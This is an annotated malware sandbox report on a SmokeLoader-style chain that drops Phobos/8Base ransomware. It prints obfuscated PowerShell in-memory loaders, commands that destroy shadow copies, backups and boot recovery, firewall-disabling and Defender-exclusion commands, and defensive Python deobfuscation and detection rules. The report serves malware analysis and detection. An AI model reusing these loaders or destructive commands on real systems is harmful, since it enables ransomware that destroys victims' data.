  2924 WMIC.exe: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (this sequence of 21 appears twice)
  4592 wbengine.exe: SeBackupPrivilege, SeRestorePrivilege, SeSecurityPrivilege
  1168 E4D8.exe: SeDebugPrivilege
Suspicious use of WriteProcessMemory 64 IoCs
Processes (writer pid and image -> target pid and image; number of logged writes):
  1960 e142f4e8eb3fb4323fb377138.exe -> 3656 e142f4e8eb3fb4323fb377138.exe  (6)
  2636 (process name not recorded) -> 4200 D5D3.exe  (2)
  2636 -> 1168 E4D8.exe  (3)
  2636 -> 1816 E834.exe  (3)
  2636 -> 4480 EA96.exe  (3)
  2636 -> 2424 ED76.exe  (3)
  2636 -> 4552 explorer.exe  (4)
  1816 E834.exe -> 1284 powershell.exe  (3)
  2636 -> 1668 explorer.exe  (3)
  2636 -> 452 explorer.exe  (4)
  2636 -> 1164 explorer.exe  (4)
  2636 -> 2324 explorer.exe  (4)
  2636 -> 2056 explorer.exe  (3)
  2636 -> 1248 explorer.exe  (4)
  4480 EA96.exe -> 1204 cmd.exe  (2)
  4480 EA96.exe -> 4548 cmd.exe  (2)
  2636 -> 4476 explorer.exe  (3)
  2636 -> 1036 explorer.exe  (4)
  4548 cmd.exe -> 4376 netsh.exe  (2)
  1204 cmd.exe -> 4680 vssadmin.exe  (2)
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.

outlook_office_path 1 IoCs
Processes (description, ioc, process):
  Key opened  \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  explorer.exe

outlook_win_path 1 IoCs
Processes (description, ioc, process):
  Key opened  \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe"C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe"C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3656
-
-
C:\Users\Admin\AppData\Local\Temp\D5D3.exeC:\Users\Admin\AppData\Local\Temp\D5D3.exe1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:4200
-
C:\Users\Admin\AppData\Local\Temp\E4D8.exeC:\Users\Admin\AppData\Local\Temp\E4D8.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1168 -
C:\Users\Admin\AppData\Local\Temp\E4D8.exe"C:\Users\Admin\AppData\Local\Temp\E4D8.exe"2⤵
- Executes dropped EXE
PID:2956
-
-
C:\Users\Admin\AppData\Local\Temp\E4D8.exe"C:\Users\Admin\AppData\Local\Temp\E4D8.exe"2⤵
- Executes dropped EXE
PID:4652
-
-
C:\Users\Admin\AppData\Local\Temp\E4D8.exe"C:\Users\Admin\AppData\Local\Temp\E4D8.exe"2⤵
- Executes dropped EXE
PID:3748
-
-
C:\Users\Admin\AppData\Local\Temp\E4D8.exe"C:\Users\Admin\AppData\Local\Temp\E4D8.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:2116 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SRD.bat" "3⤵PID:6100
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\SRD.bat"4⤵PID:4052
-
C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe"C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe" -w hidden -c $RwDC='InVBDevokVBDeeVBDe'.Replace('VBDe', '');$IGVN='CreVBDeatVBDeeDecVBDeryptVBDeorVBDe'.Replace('VBDe', '');$qKLC='LoaVBDedVBDe'.Replace('VBDe', '');$fwfx='TVBDeranVBDesfVBDeorVBDemVBDeFinVBDeaVBDelVBDeBlVBDeocVBDekVBDe'.Replace('VBDe', '');$QupE='FrVBDeoVBDemBaVBDese6VBDe4StVBDeriVBDengVBDe'.Replace('VBDe', '');$GEjb='ChVBDeangVBDeeEVBDextVBDeenVBDesionVBDe'.Replace('VBDe', '');$XbqZ='ReaVBDedLiVBDenesVBDe'.Replace('VBDe', '');$dNNl='ElVBDeemeVBDentVBDeAtVBDe'.Replace('VBDe', '');$niMU='EVBDentVBDeryPVBDeoinVBDetVBDe'.Replace('VBDe', '');$CXFs='GetCVBDeurVBDereVBDenVBDetPVBDerocVBDeessVBDe'.Replace('VBDe', '');$tMEM='SplVBDeitVBDe'.Replace('VBDe', '');$yGFh='MaVBDeinVBDeModVBDeulVBDeeVBDe'.Replace('VBDe', '');function RcHQK($SJfnN){$ePbJG=[System.Security.Cryptography.Aes]::Create();$ePbJG.Mode=[System.Security.Cryptography.CipherMode]::CBC;$ePbJG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$ePbJG.Key=[System.Convert]::$QupE('JDkzO6XH5gH021W2Y/ObVS2k+/ofiQdjxBF86RM/vL8=');$ePbJG.IV=[System.Convert]::$QupE('TPQFXcwHNdZ9KljZbDDnEA==');$uQtJU=$ePbJG.$IGVN();$QRiSY=$uQtJU.$fwfx($SJfnN,0,$SJfnN.Length);$uQtJU.Dispose();$ePbJG.Dispose();$QRiSY;}function nTqSF($SJfnN){$vKyUA=New-Object System.IO.MemoryStream(,$SJfnN);$flWoW=New-Object System.IO.MemoryStream;$gLlPI=New-Object System.IO.Compression.GZipStream($vKyUA,[IO.Compression.CompressionMode]::Decompress);$gLlPI.CopyTo($flWoW);$gLlPI.Dispose();$vKyUA.Dispose();$flWoW.Dispose();$flWoW.ToArray();}$fsXoM=[System.Linq.Enumerable]::$dNNl([System.IO.File]::$XbqZ([System.IO.Path]::$GEjb([System.Diagnostics.Process]::$CXFs().$yGFh.FileName, $null)), 1);$JMYTy=$fsXoM.Substring(2).$tMEM(':');$fhNaK=nTqSF (RcHQK ([Convert]::$QupE($JMYTy[0])));$Prmhn=nTqSF (RcHQK 
([Convert]::$QupE($JMYTy[1])));[System.Reflection.Assembly]::$qKLC([byte[]]$Prmhn).$niMU.$RwDC($null,$null);[System.Reflection.Assembly]::$qKLC([byte[]]$fhNaK).$niMU.$RwDC($null,$null);5⤵
- Checks computer location settings
- Executes dropped EXE
PID:4312 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\SRD')6⤵PID:6092
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(4312);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;6⤵PID:6008
-
-
-
-
-
    3⤵ C:\Windows\SysWOW64\cmd.exe  (PID 6136)
      cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sv.bat" "
      4⤵ C:\Windows\SysWOW64\cmd.exe  (PID 5240)
        cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\sv.bat"
        Note: /K keeps this cmd.exe alive after the batch file finishes; the batch launches the renamed PowerShell host below, which in turn reads its payload back out of sv.bat.
        5⤵ C:\Users\Admin\AppData\Local\Temp\sv.bat.exe  (PID 5996)
          cmdline: "C:\Users\Admin\AppData\Local\Temp\sv.bat.exe" -w hidden -c $QmQC='ElwQysewQysmwQysentwQysAwQystwQys'.Replace('wQys', '');$Cvyq='LowQysadwQys'.Replace('wQys', '');$Abka='GetwQysCurwQysrenwQystwQysProwQyscewQyssswQys'.Replace('wQys', '');$kkEJ='CrwQyseawQystewQysDewQyscrwQysyptwQysorwQys'.Replace('wQys', '');$uvnc='FrwQysomwQysBaswQyse64wQysStrwQysinwQysgwQys'.Replace('wQys', '');$oAYO='EwQysnwQystryPwQysowQysinwQystwQys'.Replace('wQys', '');$eVXi='ChawQysnwQysgewQysExwQystenwQyssiwQysowQysnwQys'.Replace('wQys', '');$KwUx='MwQysainwQysMowQysdwQysulwQysewQys'.Replace('wQys', '');$Nyws='InvowQyskewQys'.Replace('wQys', '');$JsiC='RwQyseadwQysLiwQysnewQysswQys'.Replace('wQys', '');$xxaz='SwQyspwQysliwQystwQys'.Replace('wQys', '');$OtLn='TrawQysnsfwQysormwQysFinwQysalwQysBlocwQyskwQys'.Replace('wQys', '');function coZUI($OpQVj){$aZVET=[System.Security.Cryptography.Aes]::Create();$aZVET.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aZVET.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aZVET.Key=[System.Convert]::$uvnc('iQPIhpce7ki6o+IHmlOhdoHm7HC8khIfOxAgdAkNw7A=');$aZVET.IV=[System.Convert]::$uvnc('NkX2UOU09KDD8//UYPJBsg==');$RGpCI=$aZVET.$kkEJ();$aARwL=$RGpCI.$OtLn($OpQVj,0,$OpQVj.Length);$RGpCI.Dispose();$aZVET.Dispose();$aARwL;}function fvMWD($OpQVj){$EEpkF=New-Object System.IO.MemoryStream(,$OpQVj);$pDChj=New-Object System.IO.MemoryStream;$BBOEV=New-Object System.IO.Compression.GZipStream($EEpkF,[IO.Compression.CompressionMode]::Decompress);$BBOEV.CopyTo($pDChj);$BBOEV.Dispose();$EEpkF.Dispose();$pDChj.Dispose();$pDChj.ToArray();}$YoalJ=[System.Linq.Enumerable]::$QmQC([System.IO.File]::$JsiC([System.IO.Path]::$eVXi([System.Diagnostics.Process]::$Abka().$KwUx.FileName, $null)), 1);$ZnOcq=$YoalJ.Substring(2).$xxaz(':');$njBYj=fvMWD (coZUI ([Convert]::$uvnc($ZnOcq[0])));$BkieQ=fvMWD (coZUI ([Convert]::$uvnc($ZnOcq[1])));[System.Reflection.Assembly]::$Cvyq([byte[]]$BkieQ).$oAYO.$Nyws($null,$null);[System.Reflection.Assembly]::$Cvyq([byte[]]$njBYj).$oAYO.$Nyws($null,$null);
          - Checks computer location settings
          - Executes dropped EXE
          Note: same loader as SRD.bat.exe with a different junk token ('wQys'), different variable names and a different AES key and IV; the structure (read line 2 of sv.bat, skip two characters, split on ':', Base64, AES-CBC, GZip, Assembly.Load) is identical.
          6⤵ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 2960)
            cmdline: "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\sv')
          6⤵ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 2264)
            cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(5996);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
            Note: same scheduled-task check and self-delete pair as under SRD.bat.exe, this time for PID 5996.
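Both loaders above (SRD.bat.exe and sv.bat.exe) hide every .NET member name by splicing a junk token into it and calling .Replace() at run time, so a static reader sees only $RwDC, $IGVN and friends. The script below is an added example written for this page, not code from the report or from the malware author: it resolves those assignments, substitutes the names back into the loader and lists the [Type]::Member calls in order, which makes the ReadLines/ElementAt/Substring/Split/FromBase64String/Load chain readable without executing anything. The input is a constructed excerpt of the SRD.bat.exe command line (the AES and GZip helper functions are left out because they only wrap the members named in the preamble); the same code handles the sv.bat.exe variant because the obfuscation pattern is identical.

```python
import re

# Constructed sample: the variable preamble and the loader tail of the
# SRD.bat.exe command line from the process tree above (AES/GZip helper
# functions omitted; they only call the members resolved here).
SAMPLE = (
    "$RwDC='InVBDevokVBDeeVBDe'.Replace('VBDe', '');"
    "$IGVN='CreVBDeatVBDeeDecVBDeryptVBDeorVBDe'.Replace('VBDe', '');"
    "$qKLC='LoaVBDedVBDe'.Replace('VBDe', '');"
    "$fwfx='TVBDeranVBDesfVBDeorVBDemVBDeFinVBDeaVBDelVBDeBlVBDeocVBDekVBDe'.Replace('VBDe', '');"
    "$QupE='FrVBDeoVBDemBaVBDese6VBDe4StVBDeriVBDengVBDe'.Replace('VBDe', '');"
    "$GEjb='ChVBDeangVBDeeEVBDextVBDeenVBDesionVBDe'.Replace('VBDe', '');"
    "$XbqZ='ReaVBDedLiVBDenesVBDe'.Replace('VBDe', '');"
    "$dNNl='ElVBDeemeVBDentVBDeAtVBDe'.Replace('VBDe', '');"
    "$niMU='EVBDentVBDeryPVBDeoinVBDetVBDe'.Replace('VBDe', '');"
    "$CXFs='GetCVBDeurVBDereVBDenVBDetPVBDerocVBDeessVBDe'.Replace('VBDe', '');"
    "$tMEM='SplVBDeitVBDe'.Replace('VBDe', '');"
    "$yGFh='MaVBDeinVBDeModVBDeulVBDeeVBDe'.Replace('VBDe', '');"
    "$fsXoM=[System.Linq.Enumerable]::$dNNl([System.IO.File]::$XbqZ("
    "[System.IO.Path]::$GEjb([System.Diagnostics.Process]::$CXFs().$yGFh.FileName, $null)), 1);"
    "$JMYTy=$fsXoM.Substring(2).$tMEM(':');"
    "$fhNaK=nTqSF (RcHQK ([Convert]::$QupE($JMYTy[0])));"
    "$Prmhn=nTqSF (RcHQK ([Convert]::$QupE($JMYTy[1])));"
    "[System.Reflection.Assembly]::$qKLC([byte[]]$Prmhn).$niMU.$RwDC($null,$null);"
    "[System.Reflection.Assembly]::$qKLC([byte[]]$fhNaK).$niMU.$RwDC($null,$null);"
)

# One match per "$name='obfuscated'.Replace('junk', '');" assignment.
ASSIGN = re.compile(r"\$(\w+)='([^']*)'\.Replace\('([^']*)', ''\);")


def resolve_names(script):
    """Map each throwaway variable to the .NET member name it hides."""
    return {var: obf.replace(junk, "") for var, obf, junk in ASSIGN.findall(script)}


def deobfuscate(script):
    """Drop the assignment preamble and replace every $var with its real name.

    Longer variable names are substituted first and the match is anchored
    with \\b, so a name that is a prefix of another cannot clobber it.
    """
    names = resolve_names(script)
    body = ASSIGN.sub("", script)
    for var in sorted(names, key=len, reverse=True):
        body = re.sub(r"\$" + re.escape(var) + r"\b", names[var], body)
    return body


def dotnet_calls(script):
    """Ordered, de-duplicated [Type]::Member static calls in the cleaned script."""
    pairs = re.findall(r"\[([\w.]+)\]::(\w+)", deobfuscate(script))
    return list(dict.fromkeys(pairs))


if __name__ == "__main__":
    for var, name in resolve_names(SAMPLE).items():
        print(f"${var:<6} -> {name}")
    print()
    print(deobfuscate(SAMPLE))
    print()
    for type_name, member in dotnet_calls(SAMPLE):
        print(f"[{type_name}]::{member}")
```

The resolved tail reads [System.Reflection.Assembly]::Load([byte[]]$Prmhn).EntryPoint.Invoke($null,$null), i.e. an in-memory .NET load with no file ever written. Recovering the payload itself needs the .bat file that sits next to the .bat.exe, which the report does not include; with it, the same three steps (Base64, AES-CBC with the key and IV from the script, GZip) apply to each ':'-separated half of its second line.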
1⤵ C:\Users\Admin\AppData\Local\Temp\E834.exe  (PID 1816)
  cmdline: C:\Users\Admin\AppData\Local\Temp\E834.exe
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  2⤵ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 1284)
    cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
    - Blocklisted process makes network request
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    3⤵ C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe  (PID 5896)
      cmdline: C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
      Note: a 32-bit powershell.exe started with no script, hiding its threads from debuggers and calling SetThreadContext, followed by a .NET Framework utility launched with no arguments (and with forward slashes in its path), is the pattern of a payload being hollowed into aspnet_compiler.exe; the report does not confirm the injection, so treat PID 5896 as the process to memory-dump.
1⤵ C:\Users\Admin\AppData\Local\Temp\EA96.exe  (PID 4480)
  cmdline: C:\Users\Admin\AppData\Local\Temp\EA96.exe
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops desktop.ini file(s)
  - Drops file in Program Files directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  2⤵ C:\Users\Admin\AppData\Local\Temp\EA96.exe  (PID 4812)
    cmdline: "C:\Users\Admin\AppData\Local\Temp\EA96.exe"
    - Executes dropped EXE
    3⤵ C:\Windows\SysWOW64\WerFault.exe  (PID 3148)
      cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4812 -s 216
      - Program crash
  2⤵ C:\Windows\system32\cmd.exe  (PID 4548)
    cmdline: "C:\Windows\system32\cmd.exe"
    - Suspicious use of WriteProcessMemory
    3⤵ C:\Windows\system32\netsh.exe  (PID 4376)
      cmdline: netsh advfirewall set currentprofile state off
      - Modifies Windows Firewall
    3⤵ C:\Windows\system32\netsh.exe  (PID 3468)
      cmdline: netsh firewall set opmode mode=disable
      - Modifies Windows Firewall
  2⤵ C:\Windows\system32\cmd.exe  (PID 1204)
    cmdline: "C:\Windows\system32\cmd.exe"
    - Suspicious use of WriteProcessMemory
    3⤵ C:\Windows\system32\vssadmin.exe  (PID 4680)
      cmdline: vssadmin delete shadows /all /quiet
      - Interacts with shadow copies
    3⤵ C:\Windows\System32\Wbem\WMIC.exe  (PID 2924)
      cmdline: wmic shadowcopy delete
      - Suspicious use of AdjustPrivilegeToken
    3⤵ C:\Windows\system32\bcdedit.exe  (PID 268)
      cmdline: bcdedit /set {default} bootstatuspolicy ignoreallfailures
      - Modifies boot configuration data using bcdedit
    3⤵ C:\Windows\system32\bcdedit.exe  (PID 996)
      cmdline: bcdedit /set {default} recoveryenabled no
      - Modifies boot configuration data using bcdedit
    3⤵ C:\Windows\system32\wbadmin.exe  (PID 2940)
      cmdline: wbadmin delete catalog -quiet
      - Deletes backup catalog
  Note: the two cmd.exe children of PID 4480 carry the recovery-inhibition step that the "Deletes shadow copies" and "Modifies boot configuration data" signatures refer to: both firewall profiles are switched off (the legacy netsh firewall syntax is tried as well as advfirewall), shadow copies are removed by two different tools so that one failing does not matter, Windows Recovery and boot-failure handling are disabled, and the wbadmin backup catalog is destroyed. Together with the desktop.ini drops and the file renames, this is the Phobos behaviour the report's classification rests on. The crash of the second EA96.exe instance (PID 4812, WerFault -p 4812) did not stop the chain because the parent (PID 4480) issues the commands.
1⤵ C:\Users\Admin\AppData\Local\Temp\ED76.exe  (PID 2424)
  cmdline: C:\Users\Admin\AppData\Local\Temp\ED76.exe
  - Executes dropped EXE
1⤵ C:\Windows\SysWOW64\explorer.exe  (PID 4552)
  cmdline: C:\Windows\SysWOW64\explorer.exe
  - Accesses Microsoft Outlook profiles
  - outlook_office_path
  - outlook_win_path
1⤵ C:\Windows\explorer.exe  (PID 1668)
1⤵ C:\Windows\SysWOW64\explorer.exe  (PID 452)
1⤵ C:\Windows\SysWOW64\WerFault.exe  (PID 2924)
  cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4812 -ip 4812
  Note: crash reporting for the EA96.exe child PID 4812; PID 2924 is reused here after the WMIC.exe instance above exited.
1⤵ C:\Windows\SysWOW64\explorer.exe  (PID 1164)
1⤵ C:\Windows\SysWOW64\explorer.exe  (PID 2324)
1⤵ C:\Windows\explorer.exe  (PID 2056)
1⤵ C:\Windows\SysWOW64\explorer.exe  (PID 1248)
1⤵ C:\Windows\explorer.exe  (PID 4476)
1⤵ C:\Windows\SysWOW64\explorer.exe  (PID 1036)
1⤵ C:\Windows\explorer.exe  (PID 2504)
1⤵ C:\Windows\SysWOW64\explorer.exe  (PID 4348)
1⤵ C:\Windows\system32\vssvc.exe  (PID 4816)
  - Suspicious use of AdjustPrivilegeToken
1⤵ C:\Windows\SysWOW64\explorer.exe  (PID 2732)
1⤵ C:\Windows\SysWOW64\explorer.exe  (PID 2008)
1⤵ C:\Windows\explorer.exe  (PID 4456)
1⤵ C:\Windows\SysWOW64\explorer.exe  (PID 4440)
1⤵ C:\Windows\system32\wbengine.exe  (PID 4592)
  cmdline: "C:\Windows\system32\wbengine.exe"
  - Suspicious use of AdjustPrivilegeToken
1⤵ C:\Windows\System32\vdsldr.exe  (PID 4660)
  cmdline: C:\Windows\System32\vdsldr.exe -Embedding
1⤵ C:\Windows\System32\vds.exe  (PID 4244)
  - Checks SCSI registry key(s)
1⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 4492)
  cmdline: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==
  Note: the -enc argument is UTF-16LE Base64 and decodes to Set-MpPreference -ExclusionPath C:\ , i.e. the whole system drive is excluded from Microsoft Defender scanning. The report shows no parent for this process.
1⤵ C:\Users\Admin\AppData\Local\FallbackBuffer\tzvkgtxv\PublicKey.exe  (PID 280)
  cmdline: C:\Users\Admin\AppData\Local\FallbackBuffer\tzvkgtxv\PublicKey.exe
  - Executes dropped EXE
  - Adds Run key to start application
Note: the many parentless explorer.exe instances (both the 64-bit C:\Windows\explorer.exe and the 32-bit SysWOW64 copy) are consistent with SmokeLoader's habit of injecting into explorer.exe; the SysWOW64 instance PID 4552 is the one observed reading Outlook profile paths. vssvc.exe (Volume Shadow Copy service), wbengine.exe (the wbadmin backup engine) and vds.exe/vdsldr.exe (Virtual Disk Service) are the service-side processes started by the vssadmin, wmic and wbadmin commands under EA96.exe, not additional payloads.
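Every step of the impact chain above is visible in plain process-creation telemetry: the netsh, vssadmin, wmic, bcdedit and wbadmin commands under EA96.exe, the encoded PowerShell that adds a Defender exclusion for C:\, and the .bat.exe hosts taking PowerShell switches. The following is an added example written for this page, not tooling from the report: it runs a small rule set over constructed (image, command line) events copied from the tree, decodes -enc payloads before matching so the Set-MpPreference call is caught, and parses the Phobos-style encrypted file name that appears in the Downloads list further down. Two points are assumptions rather than statements from the report: the ".bat.exe plus -w hidden -c" heuristic for a renamed powershell.exe is an inference from the arguments, and the contact address inside the encrypted file name is shown redacted as "[email protected]" on this page, so the parser accepts any text in that position.

```python
import base64
import binascii
import re

# The -enc argument of PID 4492 in the process tree above.
ENC_B64 = ("UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4A"
           "UABhAHQAaAAgAEMAOgBcAA==")

# Constructed sample events: (image, command line) pairs copied from the
# process tree above, plus one benign control line (constructed).
EVENTS = [
    (r"C:\Users\Admin\AppData\Local\Temp\sv.bat.exe",
     r'"C:\Users\Admin\AppData\Local\Temp\sv.bat.exe" -w hidden -c '
     r"$QmQC='ElwQysewQysmwQysentwQysAwQystwQys'.Replace('wQys', '');"),
    (r"C:\Windows\system32\netsh.exe", "netsh advfirewall set currentprofile state off"),
    (r"C:\Windows\system32\netsh.exe", "netsh firewall set opmode mode=disable"),
    (r"C:\Windows\system32\vssadmin.exe", "vssadmin delete shadows /all /quiet"),
    (r"C:\Windows\System32\Wbem\WMIC.exe", "wmic shadowcopy delete"),
    (r"C:\Windows\system32\bcdedit.exe", "bcdedit /set {default} bootstatuspolicy ignoreallfailures"),
    (r"C:\Windows\system32\bcdedit.exe", "bcdedit /set {default} recoveryenabled no"),
    (r"C:\Windows\system32\wbadmin.exe", "wbadmin delete catalog -quiet"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc " + ENC_B64),
    (r"C:\Windows\system32\cmd.exe", "cmd.exe /c dir"),
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the common ones.
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

RULES = [
    ("shadow_copies_deleted",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete", re.I)),
    ("recovery_disabled",
     re.compile(r"bcdedit.*\b(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I)),
    ("backup_catalog_deleted", re.compile(r"wbadmin(\.exe)?\s+delete\s+catalog", re.I)),
    ("firewall_disabled",
     re.compile(r"netsh\s+advfirewall\s+set\s+\w+\s+state\s+off"
                r"|netsh\s+firewall\s+set\s+opmode\s+mode=disable", re.I)),
    ("defender_exclusion_added", re.compile(r"Set-MpPreference\s+-ExclusionPath", re.I)),
]

# Phobos-family name: <original>.id[<8 hex>-<4 hex>].[<contact>].<ext>
PHOBOS_NAME = re.compile(
    r"^(?P<original>.+?)\.id\[(?P<victim_id>[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4})\]"
    r"\.\[(?P<contact>.+?)\]\.(?P<ext>[A-Za-z0-9]+)$")


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -enc/-EncodedCommand, or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def classify(image, cmdline):
    """Set of impact tags for one process-creation event."""
    tags = set()
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        tags.add("encoded_powershell")
        text = cmdline + " " + decoded  # match rules on the decoded script too
    for tag, rx in RULES:
        if rx.search(text):
            tags.add(tag)
    # Heuristic (assumption, not stated by the report): a .bat.exe image taking
    # PowerShell's "-w hidden -c" switches is a renamed copy of powershell.exe.
    if image.lower().endswith(".bat.exe") and re.search(r"-w\s+hidden\s+-c\b", cmdline, re.I):
        tags.add("renamed_powershell_host")
    return tags


def score(events):
    """tag -> list of command lines that raised it, across a whole tree."""
    hits = {}
    for image, cmdline in events:
        for tag in classify(image, cmdline):
            hits.setdefault(tag, []).append(cmdline)
    return hits


def parse_encrypted_name(filename):
    """Split a Phobos-style encrypted file name into its parts, or None."""
    m = PHOBOS_NAME.match(filename)
    return m.groupdict() if m else None


if __name__ == "__main__":
    for tag, lines in sorted(score(EVENTS).items()):
        print(f"{tag}: {len(lines)} hit(s)")
    print(decode_encoded_command("powershell.exe -enc " + ENC_B64))
    print(parse_encrypted_name("AppvIsvSubsystems64.dll.id[2A5E155A-3483].[[email protected]].8base"))
```

Seven distinct tags from one process tree is the point: any one of these commands has a legitimate administrative use, but firewall off, shadow copies gone, recovery disabled, backup catalog deleted and a drive-wide Defender exclusion within the same minute is the ransomware precursor pattern worth alerting on as a cluster rather than per command.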
Network
MITRE ATT&CK Enterprise v6
Downloads

Each entry is one file the sandbox captured. The report shows a path only for the first one; hashes that were listed several times (the same content written to several paths) are collapsed here with their count.

- C:\Program Files\Common Files\microsoft shared\ClickToRun\AppvIsvSubsystems64.dll.id[2A5E155A-3483].[[email protected]].8base
  An encrypted file in the Phobos-family naming scheme (original name, victim ID, contact address, extension; 8Base is a Phobos variant). The contact address is shown redacted as [email protected] on this page.
  Filesize: 3.2MB
  MD5: 0dc99a7d6e168c3c0c5d6ed232d94c52
  SHA1: bdf28326bd6ee0e546c1a2596545b79feb019e9d
  SHA256: 40ef8da2345a64d9d7a5450969f9e0093b7981b47ad63a902f47414111215708
  SHA512: 0cc8a5723cdbacf98c8a42119debd8edccbc09276f23f7e38c99250952d485599e4b733d49888caa36fe7bbaab31f7e12ad0c8c28f209e796c37950aab892c6a
- Unnamed file, listed 4 times
  Filesize: 235KB
  MD5: 0f281d2506515a64082d6e774573afb7
  SHA1: 8949f27465913bf475fceb5796b205429083df58
  SHA256: 2288a0c896757647538a7dab5e0c980b70b173ed36c9e6206f6701dfd4112cfb
  SHA512: f4ddb22c7dec04ca862d3df88e285025e02c185dbb2c061e9d0092ba3e8e8e083ca55612aae6b2d5792038729c55c0eaf193048991c0b06c8639a52017102622
- Unnamed file, listed 4 times
  Filesize: 1.4MB
  MD5: 4ee88295d65b7a6e566d200a1c842801
  SHA1: 5dfb320e933425cea8188f8f7dab346796c3b090
  SHA256: b93b9b4b0168407f63a6c2c16a96e4a4b41d5d715bdb9f46254a214570ba1b6b
  SHA512: caab773590efe1cab87d209057bb557d52034b522c3fa47e4fb88b792418928cc0eb9a9d45c3c9131bd4af90153d8c44fae0040b04dec484e317ab4c44c7a6c4
- Unnamed file
  Filesize: 50KB
  MD5: e962f362e96d032ba9dee1b5217fe97e
  SHA1: 9c481e8e5b3508681ca306931d117ccf051b6ea0
